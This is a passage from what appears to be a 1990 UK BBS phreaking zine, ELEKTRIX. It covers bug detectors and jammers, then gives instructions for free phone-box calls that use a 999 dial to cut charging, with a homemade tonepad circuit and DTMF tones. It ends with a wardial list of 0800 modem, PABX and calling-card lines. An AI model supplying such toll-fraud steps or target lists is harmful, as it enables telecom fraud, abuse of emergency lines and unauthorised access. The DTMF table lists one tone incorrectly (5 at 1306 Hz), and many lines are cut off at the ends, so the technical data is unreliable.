such as subcarriers, and a second frequency indicator for the subcarrier.
|
||
|
||
You can pick up a spectrum analyser which detects RF radiation including singl
|
||
sideband, pulse width transmissions and those with the carrier wave removed, o
|
||
a very wide band coverage.
|
||
|
||
Cable Checkers
|
||
|
||
This is just a portable metal detector to see where mysterious wiring is going
|
||
they can be bought anywhere. Also a screamer is available which will detect
|
||
whther there is a microphone on either end and the MIC will emit a loud noise
|
||
and so can be located. Also you can use an inductive mic and an amplifier to
|
||
check to see if anything is on the line.
|
||
|
||
Detectors can be built using a field strength meter and replacing it with a
|
||
led, some have a sensitivity control.
|
||
|
||
Another way to detect a bug is to install a telephone watchdog which detects
|
||
the resistance or capacitance of the line, if anybody cuts in or installs a bu
|
||
the devices led will go on - this will only respond to change so any bug on
|
||
already wil not be detected.
|
||
|
||
Scramblers - simple scramblers are available, but so are descrambler`s. The
|
||
more expensive scramblers alter the frequency and parts of speech around 650
|
||
to 750 times a second. These can virtually defeat any attempt to descramble,
|
||
except of course the american security agency.
|
||
|
||
Jammers - these are simply wide band transmitters which transmit white noise.
|
||
these will also jam tv`s radios etc....Another jammer uses two high frequency
|
||
transmitters and will cause any microphone to squeal at the difference between
|
||
the two. Another magnetically induces an intense noise in the handset micropho
|
||
which will block any infinity or hookswitch defeats. Any contact mics can be
|
||
jammed by buzzers or vibrators stuck to the window or sounding board.
|
||
|
||
THE detector - all bugs use at least one semi conductor, if an ultra high
|
||
freqency carrier wave is emmited it will be radiated back by the bug. This
|
||
radiation will contain strong harmonic components - ( a harmonic is a componen
|
||
where the frequency is an exact numerical multiple of the fundamental or
|
||
strongest frequency. This strongest frequency is the first harmonic, twice the
|
||
frequency is the second harmonic and so on.). Other objects will only radiate
|
||
back to the second harmonic and only a semi-conductor junction will produce a
|
||
third harmonic. A small UHF transmitter and a reciver tuned to the third
|
||
harmonic is all that is needed ( use like a field strength meter), the radiati
|
||
emitted back will be minute so teh detector will be expensive and have to be v
|
||
close to the bug.
|
||
|
||
|
||
--------------------- Palm Beach BBS - +44(303)-265979 -----------------------
|
||
|
||
----------------------------------------------------------------------------
|
||
| |
|
||
| ELEKTRIX Issue 1 - Part 4 |
|
||
| ~~~~~~~~~~~~~~~~~~~~~~~~~ |
|
||
| |
|
||
| Make your own Tonepad for Phone Box phreaking |
|
||
| by Maxhack |
|
||
| |
|
||
| PALM BEACH BB UK ++44(303)-265979 |
|
||
| |
|
||
----------------------------------------------------------------------------
|
||
|
||
The Technique
|
||
|
||
Some weeks ago free dialling with tonepads came to the news in a daily
|
||
newspaper. Since then there has been much in the way of media hype covering
|
||
these devices in computer magazines and hackers files. This file will, I
|
||
hope,make the whole practise clear and the method easy and also less costly
|
||
than previously.
|
||
The way it works is as follows: The technique will ONLY work from phone
|
||
boxes contrary to what you may have been told. You may also find that it is
|
||
not working on some London phone boxes - this is due to the fact that many
|
||
have been modified to disallow phreakers from using the method.
|
||
The technique relies on the fact that dialling 999 on a phone box auto-
|
||
matically disconnects the charging mechanism whilst the call is being made.
|
||
The tonepads which allow people to make free calls are just portable models
|
||
of the tone-dialling telephone circuits that are in your telephones and in
|
||
modern modems. The tones they generate are perfectly 'legal' and are simply
|
||
used in portable units for Computerdial services (Share price indexes,etc.)
|
||
for travelling businessmen and other groups who may use such services (like
|
||
voice mail or whatever). All you do is the following:
|
||
|
||
[1] Go to a phone box.
|
||
[2] Dial the number you wish to connect to using the keypad.
|
||
[3] As soon as the phone starts ringing dial 999 on the phonebox machine as
|
||
fast as possible. This will have cut the charging mechanism and you will
|
||
have a free call.
|
||
|
||
* For boxes that have been modified......Simply put 10p in first then do *
|
||
* it - you won't loose your money but you will still make a free call. *
|
||
* This has to be done since they are modified so that they won't dial a *
|
||
* number (except 999/linkline 0800/government) unless money has been dep *
|
||
* osited in the machine.
|
||
|
||
|
||
Method 1
|
||
--------
|
||
|
||
You can record the tones required to dial a number onto a tape and then
|
||
play them down the telephone with a standard taperecorder. This has three
|
||
main drawbacks however although it is the least costly method.
|
||
|
||
1) You will need to record a different set of tones for each number. So un-
|
||
less you dial a few numbers repeatedly then you are going to find this
|
||
method very tiresome. You'll need to have a DTMF modem/phone too.
|
||
|
||
2) The phone system requires that each tone is within 1.5% of the specified
|
||
frequencies. This will prove to be difficult if you don't own very good
|
||
recording equipment.
|
||
|
||
3) You will look very conspicuous playing around with a tape recorder in a
|
||
phone box.
|
||
|
||
Despite the disadvantages it has to be remembered that this method is the
|
||
cheapest option open to you.
|
||
|
||
|
||
Method 2
|
||
--------
|
||
|
||
This involves building your own portable tonepad (unless you want to fork
|
||
out <20>12-50 for a Tandy one). The device is small, effective and relatively
|
||
cheap.
|
||
|
||
One method is as follows:
|
||
|
||
|
||
[Battery] _______
|
||
+9V --------|6 |----<14-----123
|
||
| |----<13-----456 Numeric Keypad lines
|
||
| |----<12-----789
|
||
--------|16 |----<11-----*0#
|
||
[Speaker] S | |----<3------'||
|
||
--------|1 |----<4-------'|
|
||
| | | |----<5--------'
|
||
| --|15 7|---
|
||
| | | X [3.579545 MHz Crystal]
|
||
| | 8|---
|
||
| -------
|
||
GND TCM5087
|
||
(-Ve on battery)
|
||
|
||
That way is simple to build since few components are needed...get a keypad
|
||
off an old remote controller or something...or make your own from Push-to-
|
||
make switches. Other methods include using two 555s to generate the tones
|
||
or two 8037s (wave form gen. chips) though this is a little too expensive
|
||
for my liking and only needs more complex circuitry.
|
||
|
||
If you intend to use 555s then you'll need a monostable on each 555 and the
|
||
frequencies used are as follows:
|
||
|
||
* - 941 & 1209 Hz
|
||
# - 941 & 1477 Hz
|
||
0 - 941 & 1336 Hz
|
||
1 - 697 & 1209 Hz
|
||
2 - 697 & 1336 Hz
|
||
3 - 697 & 1477 Hz
|
||
4 - 770 & 1209 Hz
|
||
5 - 770 & 1306 Hz
|
||
6 - 770 & 1477 Hz
|
||
7 - 852 & 1209 Hz
|
||
8 - 852 & 1336 Hz
|
||
9 - 852 & 1477 Hz
|
||
|
||
|
||
-------------------- Palm Beach BBS ++44(303)-265979 -----------------------
|
||
|
||
----------------------------------------------------------------------------
|
||
| |
|
||
| ELEKTRIX Issue 1 - Part 5 |
|
||
| ~~~~~~~~~~~~~~~~~~~~~~~~~ |
|
||
| |
|
||
| Freefone interrogation - the ultimate listing |
|
||
| by Agent 7 |
|
||
| |
|
||
| PALM BEACH BB UK ++44(303)-265979 |
|
||
| |
|
||
----------------------------------------------------------------------------
|
||
|
||
|
||
I have undertaken a massive dial through of LINKLINE (0800) numbers to be
|
||
listed in this and forthcoming issues of ELEKTRIX. All were known to be in
|
||
working order when this first issue went out - May 1990. Some you may have
|
||
seen before - others you won't. I've simply collected all the known ones I
|
||
could find which were still working and listed useful information for each.
|
||
Since there seems to be much going on with Voice mailboxes, computerdial,
|
||
test lines, and PABX hacking lately I have included these too with comments
|
||
where appropriate as well as the standard modem lines. Since on occasions a
|
||
great many numbers 'side by side' have been engaged at the same time I have
|
||
included this since it may give clues to the nature of the line-use should
|
||
you wish to pursue these.
|
||
The ranges that I have dialled through myself have not always been in a
|
||
logical fashion - but then it gets real boring dialling through 1000 dead
|
||
numbers. So I try to vary it. But the results have been reasonable. If you
|
||
have made any dials through 0800 or just modem wardials then please let us
|
||
have the results so we can share them with others - it's also pointless two
|
||
people dialling through the same ranges.
|
||
I hope these lists bring you much fun! Regards Pop
|
||
|
||
Key: node = (xxx---)
|
||
number = (---xxx)
|
||
|
||
Node info:
|
||
|
||
321 - This seems to be a test area for BT's latest projects (voicedial,
|
||
computerdial, intelligent fax services etc.)
|
||
|
||
|
||
node number results notes
|
||
---- ------ ------- -----
|
||
|
||
321 100 computerdial Announced as 'Remote Update', it
|
||
requires 3 digit service codes.
|
||
101-109 no service
|
||
110 digital recording 'This service is no longer avail-
|
||
able'.
|
||
111 digital recording 'Goodbye'.
|
||
112 digital recording 'Goodbye'.
|
||
113 digital recording 'Please press start on your fax
|
||
+ fax response machine'.
|
||
114-115 computerdial British Telecom Weather Centre.
|
||
+ optional fax With voice + fax forecasts.
|
||
116 digital recording 'Goodbye'.
|
||
117 digital recording 'This is 0800 briefing'.
|
||
+ fax response
|
||
118 computerdial Puzzleline test service.
|
||
+ optional fax
|
||
119 computerdial BTRL estate agency test service.
|
||
120 PABX computerdial In the form xxx. 580 - 0800 Brief
|
||
Response#1 'That number is not
|
||
listed.'
|
||
Response#2 'That number was not
|
||
specified correctly.'
|
||
121-123 fax response
|
||
124-126 PABX computerdial
|
||
127-129 fax response
|
||
130-139 rings and rings
|
||
140-141 No service
|
||
142 Engaged
|
||
143 No service
|
||
144 Engaged
|
||
145-146 No service
|
||
147 rings and rings
|
||
148-149 No service
|
||
150-179 Engaged
|
||
180-199 rings and rings
|
||
|
||
282 443 MODEM 2400 Does nothing
|
||
809 Weird Autoanswers then nothing
|
||
861 MODEM 1200/75
|
||
871 MODEM 1200 8/N/1 Does nothing
|
||
|
||
289 237 STRANGE TONES
|
||
384 Voice recording '45-55' - Weird
|
||
485 MODEM 1200/75
|
||
643 MODEM 2400 The old US dialout
|
||
783 MODEM 1200/75
|
||
817 MODEM 1200 7/E/1 Comes up with '+++ ? ERROR'
|
||
CTRL-E gives '28301 DMLDN G'
|
||
Enter SYS - gives '+++ STF GO'
|
||
|
||
456 100 Computerdial BT Service centre computerdial sys
|
||
|
||
521 509 MODEM 2400 Weird prompt
|
||
|
||
585 111 MODEM 1200/75 Cambridge PSS port - not connected
|
||
|
||
891 002 PABX Resource line DTMF then * code
|
||
004 AT&T CARD PABX Calling card service
|
||
831 MODEM 2400 Yale Direct login
|
||
|
||
898 058 PABX
|
||
|
||
|
||
Uptodate list to be included in each ELEKTRIX issue.....
|
||
|
||
-------------------- Palm Beach BBS ++44(303)-265979 -----------------------
|